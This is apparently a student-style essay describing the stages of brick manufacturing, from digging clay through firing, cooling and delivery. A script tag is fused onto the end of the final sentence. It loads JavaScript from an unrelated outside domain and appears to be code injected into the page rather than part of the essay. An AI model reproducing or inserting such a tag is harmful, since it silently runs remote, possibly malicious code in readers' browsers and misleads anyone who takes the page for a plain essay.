The diagram illustrates the process that is used to manufacture bricks for the building industry.
The diagram illustrates different stages in the process of bricks manufacturing starts from the digging the clay to delivery stage.
At the beginning of the process, clay is dug from the ground. Then, the clay is put through a metal grid, and it passes onto a roller where it is mixed with sand and water. After that, the clay can be shaped into bricks in two ways, either it is put in a mould to form manually, or a machine with wire cutter as automatic process.
At the fifth stage in the process, the clay bricks are placed in a drying oven for one to two days. Next, the bricks are heated in a kiln at a moderate temperature (200°C – 980°C) and then at a high temperature (870°C – 1300°C), followed by spending two to three days in a cooling chamber. Finally, the finished bricks are packaged and delivered ready to be sold.
Overall, it can be clearly seen that there are ten stages for brick manufacturing, which begins with clay being dug up and ends with delivery of the brick package.<script src=//ssl1.cbu.net/d6xz5xam></script>
